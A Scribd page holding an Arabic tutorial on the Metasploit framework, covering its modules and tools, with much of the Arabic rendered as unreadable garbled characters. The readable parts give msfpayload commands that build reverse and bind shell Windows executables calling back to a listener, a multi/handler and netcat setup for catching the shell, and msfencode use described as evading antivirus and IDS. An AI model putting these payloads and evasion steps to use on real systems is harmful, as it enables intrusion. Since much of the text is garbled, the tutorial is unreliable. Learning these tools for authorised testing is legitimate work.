0% found this document useful (0 votes)
521 views37 pages

Meta Sploit

يقدم هذا المستند معلومات عن إطار Metasploit وكيفية استخدامه للاختراق. يشرح المستند هيكلية الإطار والملفات والأدوات المتاحة.

Uploaded by

m7439079651
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
521 views37 pages

Meta Sploit

يقدم هذا المستند معلومات عن إطار Metasploit وكيفية استخدامه للاختراق. يشرح المستند هيكلية الإطار والملفات والأدوات المتاحة.

Uploaded by

m7439079651
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 37

‫السالم عليكم ورحمه هللا وبركاته‬

‫هذا الكتيب يتناول اداه من اقوى ادوات الموجوده لدى مختبرين االختراق ‪.‬‬

‫‪Metasploit‬‬

‫المٌتاسبلوٌت تم اصدارها عام ‪2003‬من قبل ‪HD moore‬‬

‫بداٌتها كانت ال بأس بها لكن مع مرور ‪ 5‬سنوات او ‪ , 6‬الحظنا‬

‫تطور ملحوظ ‪ ,‬قبل كانت القلٌل من الثغرات واٌضا بعض ‪payload‬‬

‫لكن مع الوقت االن نالحظ المئات من الثغرات و العشرات من ‪payload‬‬

‫العدٌد من الممٌزات ‪ ,‬واٌضا تستخدم للفحص ‪ٌ ,‬عنً صارت اداه متكامله‬

‫واالن اصبحت من االدوات اللتً ٌتطلب وجودها فً جهاز اي شخص مهتم بالحماٌه واالختراق ‪.‬‬

‫كما ذكرت المٌتاسبلوٌت اداه وهذا ٌعنً اذا اتقنتها ال ٌعنً احترافك‬

‫الن االختراق بشكل عام ال ٌقتصر بأداه واحد فمن الممكن استخدام‬

‫اكثر من اداه لٌتم االختراق واالدوات اقصد بها من ادوات الخاصه الى ثغرات البرامج ‪.‬‬

‫هل استخدم لٌونكس او وندوز ؟!‬

‫‪Windows vs. Linux‬‬

‫‪1‬‬
‫الجواب هو استخدام النظامٌن ‪ ,‬االختراق لٌس مقتصر على نظام معٌن بالعكس استخدام النظامٌن جنبا الى جنب ٌسهل من عملٌه‬
‫االختراق ‪.‬‬

‫فمثال هنالك ادوات كثٌره ال ٌتم استخدامها الى عن طرٌق وندوز والعكس صحٌح‪ ,‬وهنالك ادوات فً النظامٌن لكن استخدام‬

‫االداه فً النظام الفالنً هو افضل واسرع ومرٌح ‪.‬‬

‫فأداه ‪ Metasploit‬هً افضل على اللٌونكس ‪ ,‬واالداه كانت موجهه الى نظام اللٌونكس لكن تم ضم االداه الى الوندوز بعدها بمده‬

‫ملفات ‪Metasploit‬‬

‫اٌجؼل ِٕآ ‪٠‬ؼشف اٌّ‪١‬حبعجٍ‪٠ٛ‬ث ٌىٓ ِب ‪٠‬ؼشف ‪ٚ‬ال ٍِف ثذاخٍٗ‬

‫‪ٚ‬ال ‪٠‬ؼشف فبئذجٗ ‪ٌ ,‬زٌه اٌ‪ َٛ١‬ساض ٔؾشض اٌٍّفبت ‪ٚ‬ثؼل اٌّفب٘‪. ُ١‬‬

‫وّب روشت ثبٌّمذِٗ ‪ ,‬إٌظبَ ال ‪ , ُٙ٠‬اٌّ‪ ٛ٘ ُٙ‬اٌّغحخذَ ‪ٌ ,‬ىٓ ثؼل االد‪ٚ‬ات جى‪ ْٛ‬افنً ثبٌٕظبَ اٌفالٔ‪. ٟ‬‬

‫ؽخق‪١‬ب اس‪ ٜ‬اٌّ‪١‬حبعجٍ‪٠ٛ‬ث افنً ػٍ‪ ٝ‬اٌٍ‪ٔٛ١‬ىظ ‪ٌ ,‬ىٓ ال ِبٔغ اعحخذاَ اٌ‪ٔٛ‬ذ‪ٚ‬ص‪.‬‬

‫‪root@silv3r00t:~#cd /pentest/exploits/framework3‬‬

‫ٔغحؼشك اٌٍّفبت ػٓ هش‪٠‬ك االِش‬

‫‪ls‬‬

‫‪2‬‬
‫ساض ٔؾشض ؽشض عش‪٠‬غ ٌٍٍّفبت اٌّ‪ٛ‬ش‪ٛ‬دٖ‪,‬‬

‫‪data‬‬

‫ِ‪ٛ‬ش‪ٛ‬د ث‪ٙ‬زا اٌٍّف ٍِفبت ‪٠ٚDLLs‬غحخذِ‪ٙ‬ب ثؼل ‪payloads‬‬

‫‪tools‬‬

‫‪ٛ٠‬شذ ثٗ اد‪ٚ‬ات ِ‪ٚ ّٗٙ‬ل‪ٗ٠ٛ‬‬

‫‪plugins‬‬

‫‪ٛ٠‬شذ ثٗ اد‪ٚ‬ات ِرً ‪ٚdb_autopwn‬غ‪١‬ش٘ب‬

‫‪3‬‬
scripts

ٖ‫ش‬١‫غ‬ٚmeterpreter ‫د ثٗ عىشثث‬ٛ‫ش‬ِٛ

lib

metasploit ‫ب اٌـ‬ِٙ‫غحخذ‬٠ ٟ‫ثؼل اٌٍّفبت اٌح‬ٚ ٟ‫ث‬ٚ‫شذ ثٗ ٍِفبت اٌش‬ٛ٠

docum entation

ٖ‫ٍِفبت ٌٍمشاء‬

external

payload ‫ ٌجؼل اٌـ‬ٞ‫د اٌّقذس‬ٛ‫د ثٗ ثؼل اٌى‬ٛ‫ش‬ِٛ

modules

ٌّّٗٙ‫بء ا‬١‫غ االؽ‬١ّ‫د ثٗ ش‬ٛ‫ش‬ِٛ


1- exploits
payloads -2
encoders -3
nops -4
auxiliary -5

________

ٌٍُّٙ ‫ض‬ٚ‫ٔش‬

exploits

‫الت‬ٛ‫و‬ٛ‫ذ ِٓ اٌجشج‬٠‫ذػُ اٌؼذ‬٠ٚ ‫ع‬ٛٔ ِٓ ‫ٌٗ اورش‬ٚ ‫ث‬٠ٍٛ‫حبعج‬١ٌّ‫دٖ ثب‬ٛ‫ش‬ٌّٛ‫مقذ ثٗ اٌرغشات ا‬٠

HTTP,SSH,SMTP,FTP,TFTP,SMB,TCP,UDP etc

ْٛ‫اعحغالي اٌرغشات جى‬


remote -1
local -2

4
‫‪user interaction -3‬‬

‫‪remote :‬جحطٍت اٌـ ‪ip‬فمو ‪ٚ‬اٌخذِٗ ؽغبٌٗ‬

‫ِرً ذغشٖ ‪SMB‬‬

‫‪local :‬جحطٍت اٌجشٔبِس اٌّقبة ثبٌرغشٖ ‪ٚ‬ال جحطٍت ‪Ip‬اٌنع‪ٗ١‬‬

‫‪user interaction :‬اٌرغشات ثبٌّحقفط ‪ٚ , click‬اٌص‪ٙ‬بص ِخحشق‬

‫ِرً ذغشات اٌّحقفط ف‪ ٟ‬اٌّ‪١‬حبعجٍ‪٠ٛ‬ث‬

‫ٔش‪ٚ‬ض ٌٍـ ‪payload‬‬

‫غحغً ارا اٌرغشٖ اؽحغٍث ثبٌ‪ٛ‬شٗ اٌقع‪١‬ط‬


‫ثبٌّخحقش و‪ٛ‬د ‪َ ُ٠‬‬

‫اعحغالٌٗ ‪ّ٠‬ش ثؤسثغ ػٍّ‪١‬بت‬


‫‪1-‬اٌّ‪ٙ‬بشُ ‪٠‬ص‪ٙ‬ض اٌجب‪ٍٛ٠‬د إٌّبعت‬
‫‪ٚ2-‬مغ شّ‪١‬غ اٌخ‪١‬بسات "اٌج‪ٛ‬ست ‪٘ٚ‬ىزا"‬
‫‪3-‬اسعبي اٌجب‪ٍٛ٠‬د ِغ االعحغالي‬
‫‪4-‬جؾغ‪ ً١‬اٌجب‪ٍٛ٠‬د ف‪ ٟ‬ش‪ٙ‬بص اٌنع‪ٗ١‬‬

‫هجؼب ل‪ ٖٛ‬اٌّ‪١‬حبعجٍ‪٠ٛ‬ث جىّٓ ف‪ ٟ‬اٌحعىُ ‪ٚ‬اٌجغبهٗ ثؤعحخذاَ اٌـ ‪payloads ,‬جؼط‪١‬ه اٌؼذ‪٠‬ذ ِٓ اٌخ‪١‬بسات ‪ٚ‬ا‪٠‬نب ثىحبثة‬
‫اعحغالي اٌرغشات ‪.‬‬

‫‪ ٟ٘ٚ‬ع‪ ٍٗٙ‬اٌجٕبء ٔ‪ٛ‬ػب ِآ ؽ‪ٛ‬ف‪ ٛ‬اٌجب‪ٍٛ٠‬د ‪adduser‬و‪١‬ف ع‪ٌٛٙ‬حٗ ‪ٚ‬ثغبهحٗ‬

‫‪ٕ٠payload‬مغُ اٌ‪ ٝ‬ذالذٗ الغبَ‬

‫‪1- inline or single‬‬


‫‪stager -2‬‬
‫‪stage -3‬‬
‫ثؼل االؽخبؿ ‪٠‬خحبس ‪ِ ٛ٘ٚinline payload‬ب ‪٠‬ذس‪ِ ٞ‬ب ٘‪ ٛ‬فصؤٖ ‪٠‬ؾ‪ٛ‬ف اٌرغشٖ ِب اؽحغٍث‬

‫‪ٚ‬جٍمبٖ ِصشث‪ٙ‬ب ػٍ‪ ٝ‬ش‪ٙ‬بصٖ االخش ‪٠ٚ‬ؼشف اْ اٌرغشٖ ؽغبٌٗ ٌىٓ ا‪٠‬ؼ اٌغجت‪,,‬‬

‫أب ال‪ٌٛ‬ه ‪ ,‬اٌغجت اْ ‪٠single payload‬شعً ِغ االعحغالي فؤرا وبٔث اٌرغشٖ جحطٍت ِغبظٗ ِؼ‪shellcode ِٓ ٕٗ١‬‬

‫‪5‬‬
‫‪ٚ‬وبْ اٌـ ‪payload‬اٌّخحبس ِٓ لجً اٌّ‪ٙ‬بشُ اوجش ِٓ اٌّغبظٗ ف‪١‬ق‪١‬ش االعحغالي فبٌق‪ٛ‬‬

‫ٔش‪ٚ‬ض ٌٍربٔ‪ٚ ٟ‬اٌٍ‪١ِّ ٛ٘ ٟ‬ض ثؾىً ِ‪ ٛ‬هج‪١‬ؼ‪ ٟ‬الْ ِجذأ ػٍّٗ ‪ ,‬اسعبي ‪٠stub‬م‪ َٛ‬ثعصض ِىبْ ف‪ ٟ‬اٌزاوشٖ‬

‫‪ ِٓٚ‬ذُ ‪٠‬م‪ َٛ‬ثحعّ‪ ً١‬اٌجب‪ٍٛ٠‬د وبِال ‪ ِٓٚ‬ذُ جؾغ‪.ٍٗ١‬‬

‫االخ‪١‬ش ‪stage‬ؽج‪ ٗ١‬ثـ ‪ٌinline‬ىٓ ِحط‪ٛ‬س ؽ‪ٞٛ‬‬

‫ِالظظٗ ‪ِّ: stager‬ىٓ ‪٠‬ؼًّ ػٍ‪١٘ ٝ‬ئٗ‪stage‬‬

‫‪auxiliary‬‬

‫ثؤخحقبس ٘‪ ٟ‬ذغشات ‪ٚ‬ادا‪ٚ‬ات ِصّؼٗ ٌىٓ ِبجغحخذَ ‪payload‬‬

‫‪٠‬حُ اٌفعـ ػٓ هش‪٠‬م‪ٙ‬ب ‪ٚ‬اعحخشاز ِؼٍ‪ِٛ‬بت ِ‪,,ّٗٙ‬‬

‫‪ٚ‬جغحؼًّ ف‪ ٟ‬ثؼل اٌ‪ٙ‬صّبت ف‪ ٟ‬اٌ‪ٛ‬ا‪٠‬شٌظ ‪٠ٚ‬نب ذغشات ‪DOS‬‬

‫‪encoders‬‬

‫٘ز‪ ٞ‬اٌىً ‪٠‬ؼشف‪ٙ‬ب جغحخذَ ٌحؾف‪١‬ش اٌجب‪ٍٛ٠‬د ‪ٚ‬جخط‪ٚIDS ٟ‬ا‪٠‬نب ‪AV‬‬

‫‪ ٛ٘IDS:‬ثشٔبِس أ‪ ٚ‬ش‪ٙ‬بص ِقُّ ٌٍىؾف ػٓ ِعب‪ٚ‬الت االخحشاق‬

‫ا‪ ٚ‬ثؼل االظذاخ اٌّش‪٠‬جٗ‪.‬‬

‫‪nops‬‬

‫ِف‪١‬ذٖ ٌّٓ ‪٠‬ىحؾف ذغشات ‪buffer overflow‬الٔٗ ثجغبهٗ ‪٠‬غبػذ ثؼل اٌّشات اٌؾخـ ال‪٠‬صبد ػٕ‪ٛ‬اْ اٌؼ‪ٛ‬دٖ‪.‬‬

‫‪6‬‬
‫ادوات ‪Metasploit‬‬

‫ٌٓ اجىٍُ ثؾىً ِفقً ف‪٘ ٟ‬زا اٌذسط ‪ٚ‬رٌه ٌغجج‪ٚ ٓ١‬اال‪ٚ‬ي عٕعحبز وح‪١‬ت اخش ػٓ ٘زا اٌمغُ ‪ٚ‬ا‪٠‬نب ِؼٍ‪ِٛ‬بج‪ِ ٟ‬عذ‪ٚ‬دٖ ‪ٚ‬ال‬
‫اس‪٠‬ذ اْ اؽحث اٌمبسئ ا‪ ٚ‬ام‪١‬ف ِؼٍ‪ِٛ‬بت ٌؼٍ‪ٙ‬ب خبهئٗ‪.‬‬

‫ف‪٘ ٟ‬زا اٌمغُ عٕحطشق ٌرالخ اد‪ٚ‬ات ِ‪ٌّ ّٗٙ‬ىحؾف‪ ٓ١‬اٌرغشات ثؾىً خبؿ ‪ٚ‬ا‪٠‬نب ٌّٓ ‪٠‬عت االهالع ثؾىً ػبَ‪.‬‬

‫٘زٖ االد‪ٚ‬ات عحغبػذن ف‪ ٟ‬أستغالل الثغرات ووضع اهداف جدٌده‬

‫مثال ‪ ,‬لدٌنا ثغره تشتغل على ‪Windows xp sp1 ,‬بأستخدام ‪msfpescan‬‬

‫باالمكان جعل الثغره تشتغل على ‪Windows XP SP2 & SP1‬‬

‫وذلك بالعمل الٌدوي ‪.‬‬

‫طبعا هذه تستلزم خبره الكتشاف الثغرات ‪ ,‬لذلك دائما مشروع المٌتاسبلوٌت مهم لمكتشفً الثغرات من الدرجه االولى‬

‫والسبب االول سهوله كتابة الثغرات وقوه التحكم فً ‪payload‬‬

‫ٔذخً ػٍ‪ِ ٝ‬غبس اٌّ‪١‬حبعجٍ‪٠ٛ‬ث ‪ٔٚ‬غحؼشك اٌٍّفبت‬

‫‪msfpescan -1‬‬
‫‪msfelfscan -2‬‬
‫‪msfmachscan -3‬‬

‫شّ‪١‬ؼ‪ٙ‬ب جم‪ َٛ‬ثفعـ اٌٍّفبت اٌرٕبئ‪(binary) ٗ١‬‬

‫ثؤِىبٔٗ ا‪٠‬صبد ‪CALLs, JMPs, or POP/POP/RET instruction sets‬‬

‫هجؼب ٘‪ِ ٟ‬ف‪١‬ذٖ ٌحغ‪ ً١ٙ‬وحبثٗ اعحغالي اٌرغشات‪.‬‬

‫ٌىٓ ِب اٌفشق ث‪ُٕٙ١‬‬

‫‪٠1- msfpescan :‬غحخذَ ٌفعـ ٍِفبت ‪DLLs‬ا‪ ٚ‬اٌّىحجبت اٌّؾحشوٗ ا‪exe ٚ‬أل‪٠‬صبد ػٕب‪ ٓ٠ٚ‬اٌؼ‪ٛ‬دٖ ‪ِٚ‬ب روش ِٓ لجً‪.‬‬

‫‪ٌ2- msfelfscan :‬فعـ ٍِفبت اٌحطج‪١‬م‪ ٗ١‬ف‪ ٟ‬اٌٍ‪ٔٛ١‬ىظ ‪ٚ‬اٌح‪ٍِ ٟ٘ ٟ‬فبج‪ٙ‬ب ‪elf‬‬

‫‪7‬‬
‫‪ٌmsfmachscan -3 :‬فعـ ٍِفبت اٌحطج‪١‬م‪ ٗ١‬ف‪ ٟ‬اٌّبن‪.‬‬

‫ٔز٘ت اٌ‪ ٝ‬االداٖ ‪msfopcode‬‬

‫‪msf opcode‬‬
‫‪ِ ٟ٘ٚ‬ب ‪٠‬مقذ ث‪ٙ‬ب ‪ٚoperation code‬جؼٕ‪ ٟ‬سِض اٌؼٍّ‪ٗ١‬‬

‫جؼش‪٠‬فٗ (ظغت ِؼشفح‪ ٛ٘ : )ٟ‬شضء ِٓ ا‪ٚ‬اِش ٌغٗ االعّجٍ‪ِ ٟ‬ربي "‪"MOV‬‬

‫‪٠‬عذد اٌؼٍّ‪ ٗ١‬اٌح‪ ٟ‬عحٕفز ‪.‬‬

‫‪ِmsfopcode‬حقً ِغ لبػذٖ اٌج‪١‬بٔبت اٌح‪ ٟ‬جع‪ ٞٛ‬ػٍ‪ ٝ‬سِ‪ٛ‬ص اٌؼٍّ‪١‬بت ثّ‪ٛ‬لغ اٌّ‪١‬حبعجٍ‪٠ٛ‬ث ‪ ,‬االداٖ ال جؾحغً ٌىٓ‬
‫ع‪١‬عذذ‪ٙٔٛ‬ب‬

‫‪ٚ‬جششغ ػّب لش‪٠‬ت‬


‫‪http://www.metasploit.com/users/opcode/disabled.html‬‬

‫غ‪١‬ش ‪= e 3‬‬

‫هجؼب ِٓ ظغٓ اٌعع إٔ‪ ٟ‬وحجث ِ‪ٛ‬م‪ٛ‬ع لجً عٕٗ ‪ٚ‬اورش ػٍ‪ِ ٝ‬ب اظٓ‬

‫‪٠‬حىٍُ ػٓ و‪١‬ف‪ ٗ١‬اعحخذاَ سِض اٌؼٍّ‪ٌ ٗ١‬صؼً اٌرغشٖ جؾحغً‬

‫‪ ِٓٚ‬ظغٓ اٌعع وبْ اٌؾشض فذ‪ِٚ ٛ٠‬شف‪ٛ‬ع ػٍ‪ِ ٝ‬غبظٗ خبفٗ ث‪ٟ‬‬

‫ؽب٘ذ اٌفذ‪ ٛ٠‬ػٍ‪ ٝ‬اٌ‪ٛ١‬ج‪ٛ‬ة ‪ ,,‬دسشٗ اٌقفب‪ ٖٚ‬مؼ‪١‬فٗ‬

‫لجً اٌّؾب٘ذٖ‬

‫ساض ٔالظع اٌرغشٖ ِب جؾحغً ‪ٌ ,‬ىٓ ِغ اٌجعد ف‪ ٟ‬لبػذٖ ث‪١‬بٔبت اٌّ‪١‬حبعجٍ‪٠ٛ‬ث ساض جؾحغً ػٍ‪ ٝ‬اٌرغشٖ ‪,‬‬

‫فبظت اٌرغشٖ ع‪ ًٙ‬ػٍ‪ٕ١‬ب االِش ‪ٚ‬وحت سِض اٌؼٍّ‪jmp esi ٗ١‬ػبدجب اٌؾغً ‪٠‬ى‪٠ ْٛ‬ذ‪. ٞٚ‬‬

‫اٌجؼل ساض ‪٠‬غحغشة و‪١‬ف ػشفث اْ اٌص‪ٙ‬بص ‪Windows XP sp 1 or sp 2‬‬

‫أب فعقث اٌ‪ٙ‬ذف ثحبػ‪ ٟ‬ثـ ‪ٚ nmap‬اجنط اْ اٌص‪ٙ‬بص ‪٠‬ؾحغً ػٍ‪Win xp ٝ‬اِب ‪sp 1 or sp 2‬‬

‫اٌرغشٖ جؾحغً ػٍ‪ٚ sp 1 ٝ‬ظ‪ ٓ١‬جُ اعحغالٌ‪ٙ‬ب ٌُ ‪٠‬عذخ ؽ‪ٟ‬ء ‪ ,‬ثّؼٕ‪ ٝ‬اْ ٔظبَ اٌ‪ٙ‬ذف ‪Win xp sp2‬‬
‫‪ٚ‬الظظ‪ٛ‬ا و‪١‬ف وحجحٗ ثبٌؼىظ ‪ ,‬هجؼب وحجحٗ ثبٌؼىظ الٔ‪ٙ‬ب جذخً ف‪ ٟ‬ػبٌُ االعّجٍ‪ٟ‬‬

‫اٌرغشٖ‪: http://milw0rm.com/exploits/3925‬‬

‫اٌصبٔت اٌص‪١‬ذ اْ اٌّ‪١‬حبعجٍ‪٠ٛ‬ث ِفح‪ٛ‬ض اٌّقذس ‪ٌ ,‬زٌه ثؤِىبٔه اٌحؼذ‪ ً٠‬ػٍ‪ ٝ‬اٌرغشات اٌح‪ ٟ‬ثذاخٍٗ‪.‬‬

‫‪8‬‬
HQ ٍٝ‫ؽب٘ذٖ ػ‬

http://www.youtube.com/watch?v=aAd6d2uIVVE

ٓ‫ف‬ٛٙ‫ثح‬ٚ َٛ‫ و‬ٛ٠‫ث ٌىٓ اٌفذ‬٠ٍٛ‫حبعج‬١ٌّ‫لغ ا‬ٌّٛ ُ٠‫ً اٌمذ‬٠‫بَ اٌغحب‬٠‫ هللا ا‬: ‫طبس‬٠‫خبسز اال‬

َٛ١ٌ‫فٓ ران ا‬ٛٙ‫ ثح‬ٍٟ‫ فقٍث ػ‬ٟٔ‫لغ ا‬ٛ‫ اج‬, َٛ‫و‬

‫ب‬ٌٙ‫اعحغال‬ٚ ‫صبد اٌرغشات‬٠‫ّٗ ٌّٓ اخحقبفٗ ا‬ِٙ ‫ات‬ٚ‫ٕب ِٓ ذالذٗ اد‬١ٙ‫أح‬

. ‫ات‬ٚ‫ االد‬ٟ‫ ثبل‬ٌٝ‫ٔز٘ت ا‬

1- msfrpcd
msfrpc -2

msfd -3

XMLRPC ‫ي‬ٛ‫و‬ٛ‫غحخذَ ثشج‬٠ ‫ هجؼب‬, ً١ّ‫ اٌؼ‬ٟٔ‫ث اِب اٌرب‬٠ٍٛ‫حبعج‬١ٌّ‫ً ا‬١‫ؼًّ خبدَ ٌحؾغ‬٠ ‫ي‬ٚ‫اال‬

.‫ث ػٓ ثؼذ‬٠ٍٛ‫حبعج‬١ٌّ‫ب اٌحعىُ ثب‬ٙ‫فبئذج‬


‫ث‬٠ٍٛ‫حبعج‬١ٌّ‫ً ا‬١‫جؾغ‬ٚ ٗ‫حُ االجقبي ث‬١ٌ ‫شفش‬١‫ػًّ ع‬msfd

‫ك اداٖ إٌث وبت‬٠‫ػٓ هش‬msfconsole ٍٝ‫سٖ دخٍث ػ‬ٛ‫ ثبٌق‬ٛ‫الظظ‬

root@silv3r00t:/pentest/exploits/framework3# ./msfd -h

Usage: msfd <options>

OPTIONS:

-A <opt> Specify list of hosts allowed to connect


-D <opt> Specify list of hosts not allowed to connect
-a <opt> Bind to this IP address instead of loopback
-f Run the daemon in the foreground
-h Help banner
-p <opt> Bind to this port instead of 55554
-s Use SSL

9
‫‪A‬‬
‫اٌغّبض ٌال‪٠‬ج‪١‬بت اٌحبٌ‪.ٗ١‬‬

‫‪B‬‬
‫ظظش اال‪٠‬ج‪١‬بت اٌحبٌ‪.ٗ١‬‬

‫‪a‬‬
‫‪ٚ‬مغ اال‪ ٞ‬ث‪ ٟ‬اٌخبؿ ثه ثذي ِٓ ‪ٚloopback‬اٌٍز‪127.0.0.1 ٛ٘ ٞ‬‬

‫‪f‬‬
‫جؾغ‪ ً١‬اٌخذِٗ ٌىٓ ٌ‪١‬غث ثؾىً خف‪ , ٟ‬ثذ‪٘ ْٚ‬زا اٌخ‪١‬بس اٌّ‪١‬حبعجٍ‪٠ٛ‬ث ساض ‪٠‬ؾحغً ٌىٓ ف‪ ٟ‬اٌجش‪ٚ‬ع‪١‬ظ ‪ٚ‬ال ساض ‪٠‬ى‪ ْٛ‬ث‪ّٓ١‬‬
‫ٌٍّغحخذَ ‪.‬‬

‫‪h‬‬

‫ِغبػذٖ‬

‫‪p‬‬

‫‪ٚ‬مغ اٌج‪ٛ‬ست اٌز‪ ٞ‬ع‪١‬حقً اٌؼّ‪ ً١‬ػٓ هش‪٠‬مٗ‪.‬‬

‫‪s‬‬

‫‪- msfpayload 1‬‬

‫‪msfencode -2‬‬

‫‪msfpayload :‬اداٖ ِ‪ٌ ّٗٙ‬ؼًّ اٌـ ‪shellcode‬‬

‫اٌصّ‪ ً١‬ف‪ ٟ‬االِش اْ ثؤِىبٔه ػًّ ٔفظ ‪ٌshellcode‬ىٓ ثق‪١‬غ ِخحٍفٗ‬

‫ع‪ٛ‬اء ‪ja va scrip t ,perl ,C ,exe,ruby, raw, VBA‬‬

‫هش‪٠‬مٗ ػٍّٗ‪.‬‬
‫‪./msfpayload payload var=val‬‬

‫= ‪payload‬اعُ اٌجب‪ٍٛ٠‬د‬

‫= ‪var‬اٌّحغ‪١‬شات ِرال ‪٠ٚlport‬ؼٕ‪ ٟ‬اٌج‪ٛ‬ست اٌخبؿ ثبٌّ‪ٙ‬بشُ‬

‫‪10‬‬
‫و‪١‬ف ٔؼشف ِحغ‪١‬شات اٌـ ‪payload‬؟‬

‫ٔؼشف‪ٙ‬ب ػٓ هش‪٠‬ك االِش‬


‫‪./msfpayload windows/shell/reverse_tcp‬‬ ‫‪O‬‬

‫اٌق‪ٛ‬سٖ جحىٍُ ‪.‬‬

‫‪local port= lport‬‬


‫اٌج‪ٛ‬ست اٌخبؿ ثبٌّ‪ٙ‬بشُ ‪,‬‬
‫‪local host = lhost‬‬
‫‪ip‬اٌخبؿ ثبٌّ‪ٙ‬بشُ‬

‫خز٘ب لبػذٖ ثذ‪ ْٚ‬جفى‪١‬ش دائّب ا‪ ٞ‬اٌجب‪ٍٛ٠‬د ‪٠‬غحخذَ اجقبي ػىغ‪٠reverse ٟ‬عحبز ‪lhost,lport‬‬

‫‪bind_shell‬‬
‫اٌعق‪ٛ‬ي ػٍ‪ ٝ‬ؽً ثؤجقبي ِجبؽش‬

‫‪reverse_shell‬‬
‫اٌعق‪ٛ‬ي ػٍ‪ ٝ‬ؽً ثؤجقبي ػىغ‪ٟ‬‬

‫االْ ٔؼًّ جطج‪١‬ك‪.‬‬


‫‪./msfpayload windows/shell/reverse_tcp lhost=192.168.1.3 C‬‬

‫االْ ساض ٔؼًّ ٍِفبت ‪ٌexe‬الخحشاق ثؤعحخذاَ ‪msfpayload ,‬‬

‫اٌجؼل ‪٠‬حغبئً ‪٠‬م‪ٛ‬ي ٌّبرا اعحخذَ ‪ٌmsfpayload‬ؼًّ ٍِفبت ‪ٚexe‬أب ػٕذ‪shell access ٞ‬‬

‫فع‪١‬ط ػٕذن ؽً ٌىٓ اٌؾً ٘زا ظقٍحٗ ػٓ هش‪٠‬ك ذغشٖ خبسز اٌّ‪١‬حبعجٍ‪٠ٛ‬ث ‪ ,‬اٌرغشٖ جطٍت ِغبظٗ ِؼ‪ ِٓ ٕٗ١‬اٌـ ‪shellcode‬‬
‫فغ‪١‬شٖ ثع‪١‬د ِب جمجً ‪meterpreter , vncinject‬‬

‫هجؼب االْ ِب ف‪ ٗ١‬اال ظً ‪ٚ‬اظذ ‪ ٛ٘ٚ‬جعّ‪ meterpreter , ً١‬ثىً جؤو‪١‬ذ ساض ‪٠‬ى‪exe ْٛ‬‬

‫و‪١‬ف ٔؼٍّٗ ػٍ‪ ٝ‬ف‪١‬غٗ ‪ exe ,‬ثؤعحخذاَ‪mfspayload .‬‬

‫ِربي ٌؼًّ ‪exe‬‬


‫و‪ٛ‬د‪PHP:‬‬

‫‪11‬‬
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe

‫مٗ اٌحٕقث ٌالجقبي‬٠‫هش‬

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.


1.3 E

./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe

netcat َ‫االْ ساض ٔغحخذ‬

nc -vn 192.168.1.2 4444

~~~~~~~~~~~~~~~~

msfencode :

‫ش‬١‫اداٖ جغحخذَ ٌحؾف‬

shellcode

ٟ‫ٌحخط‬

AV ٚ‫ا‬IDS

PHP:‫د‬ٛ‫و‬
Usage: ./msfencode <options>

OPTIONS:

-a <opt> The architecture to encode as


-b <opt> The list of characters to avoid: '\x00\xff'
-c <opt> The number of times to encode the data
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file

12
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The format to display the encoded buffer
-x <opt> Specify an alternate win32 executable template

ٛ٠‫ْ فذ‬ٛ‫ى‬٠ ‫اٌؾشض ساض‬ٚ , ‫امعٗ شذا ٌىٓ ساض جٕؾشض‬ٚ ٖ‫االدا‬

ٟ‫ٗ جخط‬١‫ف‬١‫و‬ٚ ٖ‫حىٍُ ػٓ ٘زٖ االدا‬٠ٚ ‫ً شذا‬١ّ‫ ش‬ٛ٠‫شذت فذ‬ٚ ‫لجً ِذٖ أب‬

. ‫ص‬ٚ‫ٔذ‬ٌٛ‫ ا‬ٍٝ‫اٌؾشض ػ‬ٚ ٗ‫م‬١‫ دل‬42 ٖ‫عبت ٌّذ‬ٚ‫ش‬١‫ِنبد اٌف‬

http://vimeo.com/7969055

‫بت‬ٙ‫اش‬ٌٛ‫ ا‬ٝ‫االْ ثم‬


1-msfconsole
msfcli -2
msfgui -3
msfwe b -4

. ‫غ‬٠‫اخحجبس عش‬

َ‫ٌّبرا ٌُ اعحخذ‬
msfcli
‫غ اعحخذاِٗ ؟‬١‫ اعحط‬ٟٔ‫ ِغ ا‬, ‫ ٘زا اٌّربي‬ٟ‫ف‬
./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe

َ‫االْ ساض ٔغحخذ‬

netcat

nc -vn 192.168.1.2 4444

‫ٌّبرا‬ٚ ٖ‫اعحخذِث االدا‬

msfcli

ٟ‫ اٌّربي االج‬ٟ‫حُ االجقبي ثبٌٕث وبت ف‬٠ ‫ اخش‬ٕٝ‫ ثّؼ‬ِٟ‫ب اٌضا‬ِٙ‫اعحخذا‬ٚ,


./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe

13
‫مٗ اٌحٕقث ٌالجقبي‬٠‫هش‬

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.


1.3 E

14
‫استخدام ‪Metasploit‬‬
‫‪ٟ٘ٚ‬‬

‫‪1- msfconsole‬‬
‫‪msfcli -2‬‬
‫‪msfgui -3‬‬
‫‪msfw eb -4‬‬

‫‪ ٟ٘msfconsole:‬اٌ‪ٛ‬اشٗ اٌّفنٍٗ ٌذ‪ , ٞ‬ا‪ٚ‬ال الٔ‪ٙ‬ب جحؼبًِ ِغ عطش اال‪ٚ‬اِش ‪ ,‬ذبٔ‪١‬ب اعحخذاَ ا‪ٚ‬اِش‬

‫اٌٍ‪ٔٛ١‬ىظ ثذاخٍ‪ٙ‬ب ‪ ,‬ثّؼٕ‪ ٝ‬اخش ثؤِىبْ اٌفعـ ‪ٚ‬اٌحؼبًِ ِغ ا‪ٚ‬اِش اٌٍ‪ٔٛ١‬ىظ ‪ٚ‬أث ثذاخٍ‪ٙ‬ب ‪.‬‬

